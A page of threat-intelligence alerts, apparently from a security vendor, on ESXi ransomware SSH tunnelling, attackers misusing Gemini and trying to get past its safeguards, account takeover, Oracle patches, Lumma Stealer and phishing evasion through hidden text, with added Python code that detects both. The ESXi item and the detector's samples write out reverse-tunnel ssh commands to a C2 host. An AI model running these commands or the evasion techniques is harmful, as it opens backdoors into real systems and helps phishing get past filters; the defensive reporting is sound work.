Threat Alerts

Your place for the latest CyberProof cyber threat intelligence alerts and updates

ESXi Ransomware Campaigns Exploit SSH Tunneling

03-Feb-2025
Label: Malware
Threat Level: Medium

Researchers have identified that cybercriminals behind ESXi ransomware campaigns are specifically targeting virtualized environments by utilizing SSH tunneling to bypass security defenses. These attackers adopt ‘living-off-the-land’ techniques, leveraging native utilities such as SSH to create a SOCKS tunnel between their C2 servers and the compromised system. By doing so, they seamlessly integrate with normal network traffic, ensuring persistence while evading security measures.

ESXi appliances, often overlooked in security monitoring, serve as both an entry point and a pivot for ransomware operators. These adversaries either gain access through stolen administrative credentials or exploit known vulnerabilities to bypass authentication. Once inside, they establish an SSH tunnel using built-in functionality or other common tools with similar capabilities. A simple SSH command, such as ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>, enables remote port forwarding to their C2 infrastructure. Since ESXi systems are typically stable and rarely undergo unexpected shutdowns, these tunnels act as semi-persistent backdoors, allowing attackers to maintain long-term access to compromised networks.
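As a defender-side check for the reverse-tunnel pattern described above, the following Python (added here, not code from the alert or from any vendor tool) parses process command lines collected from a host and flags ssh invocations that carry a reverse forward, ranking tunnel-only SOCKS-style ones highest. The sample command lines in SAMPLE_PROCESSES are constructed, and how the listing is collected from the host is left to the reader.

```python
import os
import re
import shlex

SAMPLE_PROCESSES = [  # constructed sample command lines from an ESXi host, not from the alert
    "ssh -fN -R 127.0.0.1:1080 svc@203.0.113.10",       # reverse SOCKS tunnel
    "ssh -N -oRemoteForward=9050 ops@198.51.100.7",      # same, spelled via -o
    "ssh -fNR 2222:127.0.0.1:22 ops@198.51.100.7",       # static reverse port forward
    "ssh backup@10.0.0.2 tar czf - /vmfs/volumes/ds1",   # benign: runs a remote command
]

def reverse_forwards(cmdline):
    """Return (specs, tunnel_only): every -R/RemoteForward value, and whether -f or -N was given."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                                    # unbalanced quotes: not parseable
        return [], False
    if not argv or os.path.basename(argv[0]) != "ssh":
        return [], False
    specs, tunnel_only, i = [], False, 1
    while i < len(argv):
        a = argv[i]
        if a.startswith("-o"):                            # -oKey=Val or -o Key=Val
            opt = a[2:] if len(a) > 2 else argv[i + 1] if i + 1 < len(argv) else ""
            i += len(a) == 2                              # consumed the separate value
            key, _, val = opt.partition("=")
            if key.strip().lower() == "remoteforward" and val:
                specs.append(val.strip())
        elif a.startswith("-") and len(a) > 1:            # clustered short flags, e.g. -fNR
            flags = a[1:]
            tunnel_only |= "f" in flags or "N" in flags
            if "R" in flags:
                rest = flags[flags.index("R") + 1:]       # value may be glued to the flag
                if not rest and i + 1 < len(argv):
                    i += 1
                    rest = argv[i]
                if rest:
                    specs.append(rest)
        i += 1
    return specs, tunnel_only

def is_socks_spec(spec):
    # A -R value with no destination (port or [addr:]port) is a reverse dynamic SOCKS proxy.
    return re.sub(r"\[[^\]]*\]", "h", spec).count(":") <= 1

def find_reverse_tunnels(cmdlines):
    """Flag ssh processes holding a reverse forward; SOCKS-style, tunnel-only ones matter most."""
    parsed = [(c, *reverse_forwards(c)) for c in cmdlines]
    return [{"cmdline": c, "forwards": s, "tunnel_only": t, "socks": any(map(is_socks_spec, s))}
            for c, s, t in parsed if s]
```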

Google Gemini Exploited for Enhanced Cyber Attacks

03-Feb-2025
Label: Trends
Threat Level: Medium

Government-backed hackers and cybercriminals worldwide are increasingly using Google’s Gemini AI to enhance their cyber-espionage and criminal activities. Instead of inventing new methods, these adversaries employ AI to improve and hasten their established techniques. Advanced persistent threat groups from Iran, along with operatives from China and North Korea, are using Gemini for tasks ranging from content creation for phishing campaigns to building out sophisticated cyber-infrastructure. Russian hackers are similarly engaging with Gemini to refine their programming tools, all while persistently trying to bypass AI safety measures meant to block such misuse.

Despite the alarming threat landscape, generative AI in cyber warfare primarily accelerates and extends existing attack methods without introducing fundamentally new techniques. This issue extends beyond Gemini, affecting other AI systems as well, and underscores the need for a proactive approach to cybersecurity in an era where AI is becoming an increasingly powerful tool in the hands of cyber attackers.

Threat Actors Leverage HTTP Client Tools for Account Takeover

03-Feb-2025
Label: Malware
Threat Level: Medium

Attackers are increasingly leveraging HTTP client tools to execute account takeover (ATO) attacks, particularly targeting cloud environments like Microsoft 365. These tools, originally designed for legitimate HTTP request handling, are now being exploited for brute force attacks, adversary-in-the-middle (AitM) techniques, and credential theft. The rise in ATO attempts, observed across numerous organizations, highlights the evolving nature of these attacks, with threat actors constantly adapting their methods to bypass security measures, including multifactor authentication (MFA).

Recent campaigns have shown how different HTTP clients are used to facilitate credential theft and unauthorized access. Attackers often begin by harvesting credentials through phishing or data breaches, followed by automated brute force attacks using widely available HTTP tools. Some campaigns incorporate AitM techniques, enabling attackers to intercept MFA tokens and gain persistent access. Once an account is compromised, threat actors establish persistence by modifying mailbox rules, exfiltrating sensitive data, and even deploying OAuth applications to maintain long-term control over the environment.

These evolving attack strategies demonstrate the adaptability of cybercriminals, who shift between different HTTP clients to optimize their success rates and evade detection. The use of new tools and techniques reflects a broader trend of ongoing refinement in ATO methodologies.

Oracle Patches Critical Exploitable Vulnerabilities Across Platforms

27-Jan-2025
Label: Vulnerability
Threat Level: Medium

Oracle’s January 2025 Critical Patch Update (CPU) addresses 318 newly identified security vulnerabilities across its product range, emphasizing the urgency of patching due to several high-severity issues that pose significant risks if exploited.

One of the most critical vulnerabilities is CVE-2025-21556 in the Oracle Agile Product Lifecycle Management (PLM) Framework, carrying a near-maximum CVSS score of 9.9. This severe flaw allows low-privileged attackers with simple HTTP network access to gain control of affected systems, making it exceptionally dangerous.

The update also mitigates CVE-2024-21287, a high-risk vulnerability with a CVSS score of 7.5 in version 9.3.6 of the Oracle Agile PLM Framework that has already been exploited, further strengthening the product’s security defenses.

Additionally, the CPU resolves multiple critical vulnerabilities, including CVE-2025-21524, CVE-2023-3961, CVE-2024-23807, CVE-2023-46604, CVE-2024-45492, CVE-2024-56337, and CVE-2025-21535, all with CVSS scores of 9.8. These flaws span various products, including JD Edwards, Oracle Agile Engineering, Oracle Communications, and the WebLogic Server, some of which have already been exploited in cyberattacks.

Furthermore, CVE-2024-37371, a critical Kerberos 5 vulnerability in Oracle Communications Billing and Revenue Management with a CVSS score of 9.1, has been addressed. This flaw could lead to memory corruption due to improperly sized message tokens, further underscoring the necessity for prompt patching.

Innovative Infection Chain Highlights Lumma Stealer’s Reach

27-Jan-2025
Label: Malware
Threat Level: Medium

A recent campaign deploying Lumma Stealer demonstrates an innovative infection chain targeting victims across various geographic regions and industry sectors. Threat actors employ a combination of fake CAPTCHA prompts and malvertising to deliver the malware while evading detection.

The infection chain begins with malvertising, embedding malicious advertisements within legitimate ad networks. These ads redirect users to websites featuring fake CAPTCHA verification prompts. Interacting with these prompts triggers the download of a ZIP archive containing the malicious payload. This ZIP file includes a loader script that installs Lumma Stealer, initiating the data exfiltration process. By leveraging these techniques, attackers disguise malicious activity as legitimate user interaction, effectively evading detection. Once deployed, Lumma Stealer extracts credentials, financial data, and system details, which are exfiltrated to the attackers’ command-and-control (C2) infrastructure.

The use of social engineering through fake CAPTCHAs, combined with malvertising for broad distribution, represents a multifaceted strategy. This approach enables the malware to bypass detection while achieving a high infection success rate.

Phishing Emails Exploit Hidden Text Techniques to Avoid Detection

27-Jan-2025
Label: Malware
Threat Level: Medium

Hidden text salting, also known as “poisoning,” is a technique increasingly employed by threat actors to evade email parsers, spam filters, and detection systems. This method involves embedding characters or elements within the HTML or CSS of emails that are invisible to recipients but interfere with detection engines relying on keyword recognition or brand extraction. Security researchers have observed a significant rise in the use of this method in phishing campaigns, showcasing its adaptability and impact in bypassing modern email security measures.

Researchers found that hidden text salting leverages CSS properties and invisible characters to obscure critical components of phishing emails. Common techniques include using CSS properties like “display: inline-block” with a zero width, or hiding text with the “overflow: hidden” property, making the inserted content invisible to the victim while confusing keyword detection systems. Threat actors also employ zero-width characters between letters of brand names, ensuring email parsers misinterpret these strings without affecting their visual presentation. These techniques effectively bypass detection engines that rely on visible text for analysis.

In addition, hidden text salting is used to disrupt language detection modules and obfuscate malicious payloads. For example, phishing emails that appear to be in English can include visually hidden foreign language strings to manipulate spam filters’ language detection algorithms. Similarly, HTML smuggling techniques involve inserting irrelevant comments into base64-encoded data within attachments, making it difficult for parsers to reconstruct and decode malicious payloads.
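To show the defender-side counterpart of the salting techniques described above, here is an added Python normalizer (not from the alert or any vendor product) that strips zero-width characters and drops CSS-hidden elements before keyword and language checks run, and reports how much hidden material the message carried. The CSS patterns, the brand list and SAMPLE_EMAIL are constructed assumptions.

```python
import re
from html.parser import HTMLParser
ZERO_WIDTH = re.compile("[\u200b\u200c\u200d\u2060\ufeff\u00ad]")  # ZWSP, ZWNJ, ZWJ, WJ, BOM, SHY
HIDDEN_STYLE = re.compile(  # inline CSS that hides an element from the reader, not the parser
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?![.\d])|"
    r"(?<![\w-])(?:max-)?(?:width|height)\s*:\s*0(?:px|em|%)?(?![.\d])", re.I)

class SaltStripper(HTMLParser):
    """Separates the text a recipient actually sees from text hidden via CSS."""
    VOID = {"br", "img", "hr", "input", "meta", "link"}   # never pushed on the stack
    def __init__(self):
        super().__init__()
        self.stack = []                                    # (tag, hidden) per open element
        self.visible, self.hidden_chunks = [], []
        self.hidden_count = 0
    def handle_starttag(self, tag, attrs):
        if tag in self.VOID:
            return
        hidden = bool(HIDDEN_STYLE.search(dict(attrs).get("style") or ""))
        self.hidden_count += hidden
        self.stack.append((tag, hidden))
    def handle_endtag(self, tag):
        if tag in self.VOID:
            return
        while self.stack and self.stack.pop()[0] != tag:   # tolerate unclosed children
            pass
    def handle_data(self, data):
        target = self.hidden_chunks if any(h for _, h in self.stack) else self.visible
        target.append(data)

def squash(parts):
    return re.sub(r"\s+", " ", " ".join(parts)).strip()

def normalize_email_html(html):  # -> (visible_text, salting_report)
    p = SaltStripper()
    p.feed(html)
    p.close()
    visible = squash(ZERO_WIDTH.sub("", t) for t in p.visible)
    report = {"zero_width_chars": len(ZERO_WIDTH.findall("".join(p.visible + p.hidden_chunks))),
              "hidden_elements": p.hidden_count, "hidden_text": squash(p.hidden_chunks)}
    return visible, report

def matches_brand(visible_text, brands=("PayPal", "Microsoft")):  # run on normalized text only
    return [b for b in brands if b.lower() in visible_text.lower()]

SAMPLE_EMAIL = (  # constructed: split brand name plus a hidden Spanish string
    '<html><body><p>Your Pay\u200bPal account needs verification.</p>'
    '<span style="display:inline-block;width:0;overflow:hidden">gracias por su atención</span>'
    '<p>Click <a href="https://example.invalid/verify">here</a> now.</p></body></html>'
)
```

Matching the brand name against the raw HTML misses it because of the zero-width space, while the normalized text matches and the report exposes the hidden foreign-language string that would otherwise skew language detection.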
